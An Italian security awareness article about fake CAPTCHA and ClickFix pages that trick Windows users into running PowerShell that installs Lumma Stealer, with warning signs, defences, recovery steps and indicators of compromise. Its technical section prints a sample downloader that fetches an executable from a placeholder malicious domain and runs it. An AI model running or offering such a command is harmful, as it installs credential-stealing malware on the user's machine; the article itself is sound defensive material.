Falsi CAPTCHA: come i criminali informatici sfruttano la fiducia per distribuire malware

Falsi CAPTCHA: come i criminali informatici sfruttano la fiducia per distribuire malware

Introduzione: il pericolo nascosto dietro le verifiche di sicurezza

Quando navighi su internet, è ormai normale incontrare CAPTCHA e verifiche di sicurezza che ti chiedono di confermare che sei umano. Tuttavia, una nuova minaccia ha trasformato questi controlli familiari in armi di distribuzione del malware. I criminali informatici hanno iniziato a creare falsi CAPTCHA che sembrano completamente legittimi, ma che in realtà nascondono comandi dannosi progettati per infettare il tuo computer.

La soluzione rapida è semplice: non eseguire mai comandi PowerShell, non copiare codici negli appunti e non installare file da una pagina di verifica CAPTCHA. I veri CAPTCHA non ti chiedono mai di aprire la finestra “Esegui” (WIN+R) o di incollare comandi nel terminale. Se vedi una richiesta di questo tipo, chiudi immediatamente la pagina.

Cosa sono i falsi CAPTCHA e come funzionano

I CAPTCHA falsi sono pagine web che imitano perfettamente le verifiche di sicurezza legittime di servizi come Cloudflare, Google reCAPTCHA e altri provider affidabili. Questi siti compromessi sono stati modificati dai criminali per contenere codice JavaScript nascosto che genera un’interfaccia ingannevole.

Quando clicchi su “Non sono un robot” o completi il finto CAPTCHA, la pagina non ti verifica semplicemente come utente legittimo. Invece, un comando PowerShell viene copiato silenziosamente negli appunti del tuo computer. La pagina quindi ti chiede di aprire lo strumento “Esegui” (WIN+R) e di incollare il contenuto premendo CTRL+V, seguito da Invio.

Una volta eseguito, questo script PowerShell avvia il download e l’installazione di Lumma Stealer, un sofisticato malware in grado di rubare:

  • Password da browser e password manager
  • Dati bancari e informazioni finanziarie
  • Criptovalute e portafogli digitali
  • Cookie di navigazione e credenziali di accesso
  • Screenshot e informazioni personali sensibili

La portata della minaccia

La diffusione di questi attacchi è stata massiccia e coordinata. Secondo i dati raccolti dai ricercatori di sicurezza:

  • Oltre 140.000 contatti con annunci pubblicitari dannosi sono stati registrati nei mesi di settembre e ottobre 2024
  • Più di 20.000 utenti sono stati reindirizzati a pagine false contenenti script dannosi
  • I paesi più colpiti sono stati Brasile, Spagna, Italia e Russia
  • Il 17% delle persone che hanno incontrato il falso CAPTCHA ha completato effettivamente i passaggi richiesti, scaricando il malware

Negli ultimi mesi, sono state scoperte campagne specifiche che sfruttavano:

  • Repository GitHub compromessi: gli attaccanti inviavano notifiche false di vulnerabilità di sicurezza con link sospetti
  • Siti bancari: falsi CAPTCHA sono stati identificati su siti di istituti finanziari greci
  • Domini WordPress obsoleti: versioni vecchie del CMS contenevano codice JavaScript nascosto in Base64

Come riconoscere un falso CAPTCHA

Sebbene i falsi CAPTCHA siano molto convincenti, ci sono segnali di allarme che puoi imparare a riconoscere:

Richieste insolite:

  • Ti viene chiesto di aprire la finestra “Esegui” (WIN+R)
  • Ti viene richiesto di copiare e incollare comandi nel terminale o nel prompt dei comandi
  • La pagina ti chiede di scaricare e eseguire file .exe, .msi o script
  • Vedi messaggi di errore che sembrano provenire da Chrome ma contengono richieste strane

Dettagli sospetti:

  • L’URL della pagina non corrisponde al dominio principale del sito
  • Il CAPTCHA appare improvvisamente dopo aver cliccato un link da email o social media
  • La pagina contiene errori di ortografia o grammatica nella lingua locale
  • Il design sembra leggermente diverso dalle verifiche che conosci

Comportamenti anomali:

  • La pagina richiede più volte la stessa verifica
  • Dopo aver completato il CAPTCHA, vieni reindirizzato a siti non correlati
  • Ricevi notifiche di permessi di notifica push dopo aver completato il CAPTCHA

Strategie di difesa e protezione

Per proteggere te e la tua organizzazione da questi attacchi, implementa le seguenti misure:

Per gli utenti individuali:

  • Sospetta sempre: se una pagina di verifica ti chiede di eseguire comandi, è un segnale di allarme. I veri CAPTCHA non richiedono mai azioni di questo tipo.
  • Verifica l’URL: controlla attentamente l’indirizzo della pagina prima di interagire con qualsiasi CAPTCHA
  • Usa un password manager: evita di inserire manualmente le password su siti sospetti
  • Mantieni il software aggiornato: assicurati che il tuo sistema operativo e i tuoi browser siano sempre aggiornati con le ultime patch di sicurezza
  • Installa un antivirus affidabile: utilizza software di protezione che possa rilevare e bloccare Lumma Stealer e malware simili

Per le aziende e i professionisti IT:

  • Monitoraggio della rete: implementa sistemi di monitoraggio che rilevino tentativi di esecuzione di script PowerShell sospetti
  • Blocco di domini noti: utilizza liste di minacce aggiornate per bloccare domini associati a falsi CAPTCHA
  • Formazione dei dipendenti: insegna al tuo team a riconoscere questi attacchi e a segnalare pagine sospette
  • Segmentazione della rete: isola i sistemi critici per limitare la propagazione del malware in caso di infezione
  • Monitoraggio del comportamento: utilizza strumenti che rilevano comportamenti anomali come copie negli appunti o esecuzioni di script non autorizzate

Varianti di attacco: ClickFix e Amadey

I criminali non si fermano ai soli falsi CAPTCHA. Hanno sviluppato varianti sempre più sofisticate:

ClickFix: al posto di un CAPTCHA, gli utenti vedono un messaggio di errore che imita lo stile di Google Chrome. Il messaggio chiede di “copiare la correzione” nella finestra del computer, ma il contenuto copiato è lo stesso script PowerShell dannoso.

Trojan Amadey: utilizzato insieme a Lumma Stealer, questo malware ha capacità ancora più pericolose:

  • Ruba credenziali dai browser e dai portafogli di criptovalute
  • Cattura screenshot del desktop
  • Ottiene accesso remoto al dispositivo tramite servizi di accesso da remoto (RDP)
  • Consente agli attaccanti di controllare il computer come se fossero seduti davanti a esso

Il ruolo delle piattaforme compromesse

Una scoperta importante è che questi attacchi non provengono da un’unica fonte centralizzata. Invece, i criminali compromettono siti web legittimi e li utilizzano come punti di distribuzione:

  • Siti WordPress obsoleti: versioni vecchie del CMS contengono vulnerabilità che permettono ai criminali di iniettare codice JavaScript
  • Server FTP compromessi: gli attaccanti ottengono accesso ai file del sito e aggiungono script nascosti
  • Hosting compromesso: interi server di hosting vengono utilizzati per ospitare falsi CAPTCHA
  • Domini nuovi: i criminali registrano anche domini completamente nuovi che imitano servizi legittimi come Cloudflare

Un esempio notevole è stato scoperto su un sito bancario greco, dove un falso CAPTCHA era stato inserito direttamente nella pagina di login.

Cosa fare se sei stato infettato

Se sospetti di aver eseguito accidentalmente uno script dannoso o di aver scaricato Lumma Stealer:

  1. Disconnetti immediatamente dalla rete: stacca il cavo Ethernet o disattiva il Wi-Fi per evitare che il malware comunichi con i server dei criminali
  2. Accedi a un computer pulito: usa un altro dispositivo per contattare il tuo banca e le aziende dei tuoi servizi online
  3. Cambia tutte le password: da un computer pulito, cambia le password di email, banca, criptovalute e altri account sensibili
  4. Contatta le autorità: segnala l’incidente ai tuoi istituti finanziari e alle autorità locali di cybersecurity
  5. Esegui una scansione completa: utilizza un antivirus affidabile o una versione live di Linux per scansionare il computer infetto
  6. Considera il ripristino del sistema: in caso di infezione grave, potrebbe essere necessario reinstallare completamente il sistema operativo

Technical Deep Dive

Per i professionisti della sicurezza informatica, ecco i dettagli tecnici degli attacchi con falsi CAPTCHA:

Analisi del codice iniettato:

Il codice JavaScript iniettato nei siti compromessi è tipicamente codificato in Base64 e contiene una funzione (ad esempio fdsjnh) che genera il falso CAPTCHA. Questa funzione:

  1. Rileva il sistema operativo dell’utente (targeting specifico per Windows)
  2. Genera un’interfaccia visiva che imita Cloudflare o reCAPTCHA
  3. Incorpora dinamicamente il favicon del dominio compromesso per aumentare la credibilità
  4. Contiene JavaScript offuscato che cattura il clic dell’utente

Payload PowerShell:

Il comando PowerShell estratto è tipicamente un file di 2 MB contenente:

  • Una variabile $a con una lunga stringa codificata in Base64
  • Decodifica della stringa per ottenere un file eseguibile (EXE)
  • Esecuzione diretta del file senza salvare su disco (tecnica fileless)

Comandi comuni osservati:

[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
$url = 'http://[dominio-malevolo]/payload.exe';
$output = "$env:TEMP\update.exe";
(New-Object System.Net.WebClient).DownloadFile($url, $output);
Start-Process $output

Varianti di distribuzione:

L’analisi di 9.494 endpoint falsi ha rivelato diverse metodologie di distribuzione:

  • VBScript downloaders (1.706 asset): utilizzano WScript.Shell per eseguire comandi
  • PowerShell downloaders (1.269 asset): impiegano Net.WebClient.DownloadFile
  • Obfuscated PowerShell (252 asset): ricostruiscono comandi da stringhe concatenate o array di caratteri
  • MSIEXEC delivery (1.212 asset): distribuiscono pacchetti Windows Installer da server ad alta porta
  • Matrix Push C2: utilizza infrastruttura matrix.cymru per il controllo remoto

Indicatori di compromissione (IOC):

Server di distribuzione identificati:

  • 95.164.53.115:5506 (VBScript)
  • 78.40.209.164:5506 (VBScript)
  • ghost.nestdns.com (PowerShell)
  • penguinpublishers.org (PowerShell)
  • Human-verify-7u.pages.dev (Cloudflare Pages compromesso)
  • Recaptcha-manual.shop (dominio malevolo)

Clustering visuale e perceptual hashing:

I ricercatori hanno utilizzato la tecnologia pHash per analizzare 9.494 endpoint. Il cluster visuale dominante (Visual Cluster 0) rappresentava il 70% di tutta l’attività (6.686 endpoint), con caratteristiche comuni:

  • Layout simile a Cloudflare
  • Tipografia coerente
  • Flussi di interazione familiari
  • Favicon dinamici dal dominio compromesso

Tuttavia, l’analisi comportamentale di 5.441 asset (85,6% di copertura) ha rivelato profonda frammentazione negli meccanismi di esecuzione, indicando attori minaccia multipli e tooling distribuito.

Rilevamento e mitigazione avanzata:

Per i team di sicurezza:

  1. Monitoraggio clipboard: implementa hook per rilevare copie di script PowerShell
  2. Analisi comportamentale: monitora esecuzioni di powershell.exe con argomenti sospetti
  3. Threat intelligence: integra feed di minacce che includono domini e IP associati a falsi CAPTCHA
  4. Sandbox analysis: detona payload sospetti in ambienti isolati
  5. Network segmentation: implementa zero-trust architecture per limitare la lateral movement
  6. EDR deployment: utilizza Endpoint Detection and Response per rilevare comportamenti anomali di Lumma Stealer

Lumma Stealer, una volta eseguito, comunica con server Command and Control (C2) per esfiltrare dati. Il malware utilizza tipicamente:

  • HTTPS per comunicazioni criptate
  • Compressione dei dati con algoritmi standard
  • Rotazione di domini C2 per evitare blocchi
  • Esfiltrazione in batch per ridurre il traffico sospetto

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto